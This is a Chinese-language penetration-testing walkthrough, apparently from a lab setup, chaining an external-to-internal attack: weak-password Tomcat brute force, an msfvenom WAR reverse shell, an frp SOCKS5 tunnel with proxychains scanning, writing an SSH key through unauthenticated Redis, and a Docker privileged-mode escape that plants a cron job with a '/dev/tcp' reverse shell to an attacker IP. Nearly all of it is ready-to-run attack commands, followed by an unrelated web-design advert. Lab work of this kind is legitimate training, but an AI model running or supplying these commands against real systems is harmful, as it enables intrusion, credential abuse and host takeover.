从外网到内网:一条完整的渗透链路
2026/5/15 7:55:20 网站建设 项目流程

一、环境搭建

这是我的现有靶场信息

起Redis未授权靶场

# 拉取镜像 docker pull redis:latest # 特权模式启动(模拟真实可写文件场景) docker run -d --name target-redis --privileged -p 6380:6379 -v /tmp:/data redis:latest redis-server --protected-mode no # 验证启动 docker ps | grep redis

验证redis未授权访问

redis-cli -h 127.0.0.1 -p 6380 info keys * config set dir /data config set dbfilename authorized_keys exit

二、外网信息收集

fscan扫描存活主机

sudo ~/tools/fscan -h 172.17.0.0/24 -np #使用自己的工具路径

全端口扫描+服务识别

sudo ~/tools/fscan -h 172.17.0.0/24 -p 1-65535

三、跳板机获取(Tomcat弱口令→蚁剑)

扫描Tomcat弱口令

sudo ~/tools/fscan -h 172.17.0.0/24 -p 8080 -user tomcat,admin -pwd tomcat,admin,123456 #弱口令爆破

WAR包部署GetShell

# 生成WAR包(用msfvenom或手动) msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.17.0.1 LPORT=4444 -f war -o shell.war # 登录Tomcat管理后台上传WAR # http://target:8080/manager/html # 部署shell.war # 蚁剑连接 # http://target:8080/shell/

四、frp SOCKS5隧道搭建

服务端配置(frps.ini)

[common] bind_port = 7000

./frps -c frps.ini #启动服务端

客户端配置(frpc.ini)

[common] server_addr = 服务端IP server_port = 7000 [plugin_socks5] type = tcp remote_port = 1080 plugin = socks5

五、proxychains代理扫描内网

配置proxychains

sudo nano /etc/proxychains4.conf # 最后一行改为: socks5 127.0.0.1 1080

通过隧道扫描

# 扫描内网存活主机 sudo proxychains nmap -sT -Pn 172.17.0.0/24 -p 22,80,3306,6379 # 扫描Redis sudo proxychains nmap -sT -Pn 172.17.0.1 -p 6379 -sV

六、内网横向移动:Redis未授权→SSH免密登录

生成SSH密钥对

ssh-keygen -t rsa -C "redis-shell" -f ~/.ssh/redis_shell # 一路回车

Redis写入公钥

# 准备公钥内容 (echo -e "\n\n"; cat ~/.ssh/redis_shell.pub; echo -e "\n\n") > /tmp/redis_key.txt # 连接Redis redis-cli -h 172.17.0.1 -p 6379 # 写入公钥 flushall config set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD... redis-shell\n\n" save exit

SSH免密登录

ssh -i ~/.ssh/redis_shell root@172.17.0.1 whoami

七、Docker逃逸(特权模式)

判断是否在Docker内

cat /proc/1/cgroup | grep docker ls -la /.dockerenv

特权模式逃逸

# 查看磁盘 fdisk -l # 挂载宿主机根目录 mkdir /host mount /dev/sda1 /host # 写入宿主机crontab echo '* * * * * bash -i >& /dev/tcp/攻击IP/4444 0>&1' >> /host/var/spool/cron/crontabs/root

八、完整渗透路径图

九、总结

外网信息收集发现薄弱入口,通过Tomcat弱口令或漏洞获取跳板机权限,搭建frp SOCKS5隧道打通内网通道,利用proxychains代理扫描发现内网Redis未授权访问,写入SSH公钥实现横向移动,最后通过Docker特权模式挂载宿主机磁盘完成逃逸,最终获取宿主机root权限和核心资产访问权。

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询